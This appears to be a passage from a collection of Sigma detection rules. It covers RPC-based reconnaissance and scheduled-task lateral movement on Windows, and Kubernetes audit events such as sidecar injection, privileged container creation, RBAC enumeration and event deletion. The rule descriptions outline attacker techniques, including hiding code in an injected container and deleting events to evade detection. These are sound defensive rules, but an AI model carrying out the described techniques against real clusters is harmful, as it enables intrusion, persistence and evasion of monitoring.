EventLog: RPCFW
InterfaceUuid: e3514235-4b06-11d1-ab04-00c04fc2dcd2
SharpHound Recon Account Discovery
- source: sigma
- technicques:
- t1087
Description
Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.
Detection logic
condition: selection
selection:
EventID: 3
EventLog: RPCFW
InterfaceUuid: 6bffd098-a112-3610-9833-46c3f87e345a
OpNum: 2
Remote Schedule Task Lateral Movement via ITaskSchedulerService
- source: sigma
- technicques:
- t1053
- t1053.002
Description
Detects remote RPC calls to create or execute a scheduled task
Detection logic
condition: selection
selection:
EventID: 3
EventLog: RPCFW
InterfaceUuid: 86d35949-83c9-4044-b424-db363231fd0c
OpNum:
- 1
- 3
- 4
- 10
- 11
- 12
- 13
- 14
- 15
Remote Schedule Task Lateral Movement via ATSvc
- source: sigma
- technicques:
- t1053
- t1053.002
Description
Detects remote RPC calls to create or execute a scheduled task via ATSvc
Detection logic
condition: selection
selection:
EventID: 3
EventLog: RPCFW
InterfaceUuid: 1ff70682-0a51-30e8-076d-740be8cee98b
OpNum:
- 0
- 1
Remote Schedule Task Lateral Movement via SASec
- source: sigma
- technicques:
- t1053
- t1053.002
Description
Detects remote RPC calls to create or execute a scheduled task via SASec
Detection logic
condition: selection
selection:
EventID: 3
EventLog: RPCFW
InterfaceUuid: 378e52b0-c0a9-11cf-822d-00aa0051e40f
OpNum:
- 0
- 1
Kubernetes Events Deleted
- source: sigma
- technicques:
- t1070
Description
Detects when events are deleted in Kubernetes. An adversary may delete Kubernetes events in an attempt to evade detection.
Detection logic
condition: selection
selection:
objectRef.resource: events
verb: delete
Potential Sidecar Injection Into Running Deployment
- source: sigma
- technicques:
- t1609
Description
Detects attempts to inject a sidecar container into a running deployment. A sidecar container is an additional container within a pod, that resides alongside the main container. One way to add containers to running resources like Deployments/DeamonSets/StatefulSets, is via a “kubectl patch” operation. By injecting a new container within a legitimate pod, an attacker can run their code and hide their activity, instead of running their own separated pod in the cluster.
Detection logic
condition: selection
selection:
apiGroup: apps
objectRef.resource: deployments
verb: patch
Privileged Container Deployed
- source: sigma
- technicques:
- t1611
Description
Detects the creation of a “privileged” container, an action which could be indicative of a threat actor mounting a container breakout attacks. A privileged container is a container that can access the host with all of the root capabilities of the host machine. This allows it to view, interact and modify processes, network operations, IPC calls, the file system, mount points, SELinux configurations etc. as the root user on the host. Various versions of “privileged” containers can be specified, e.g. by setting the securityContext.privileged flag in the resource specification, setting non-standard Linux capabilities, or configuring the hostNetwork/hostPID fields
Detection logic
condition: selection
selection:
capabilities: '*'
objectRef.resource: pods
verb: create
RBAC Permission Enumeration Attempt
- source: sigma
- technicques:
- t1069
- t1069.003
- t1087
- t1087.004
Description
Detects identities attempting to enumerate their Kubernetes RBAC permissions. In the early stages of a breach, attackers will aim to list the permissions they have within the compromised environment. In a Kubernetes cluster, this can be achieved by interacting with the API server, and querying the SelfSubjectAccessReview API via e.g. a “kubectl auth can-i –list” command. This will enumerate the Role-Based Access Controls (RBAC) rules defining the compromised user’s authorization.
Detection logic
condition: selection
selection:
apiGroup: authorization.k8s.io
objectRef.resource: selfsubjectrulesreviews
verb: create
Deployment Deleted From Kubernetes Cluster
- source: sigma
- technicques:
- t1498
Description
Detects the removal of a deployment from a Kubernetes cluster. This could indicate disruptive activity aiming to impact business operations.
Detection logic
condition: selection
selection:
objectRef.resource: deployments
verb: delete
New Kubernetes Service Account Created
- source: sigma
- technicques:
- t1136
Description
Detects creation of new Kubernetes service account, which could indicate an attacker’s attempt to persist within a cluster.
Detection logic
condition: selection
selection:
objectRef.resource: serviceaccounts
verb: create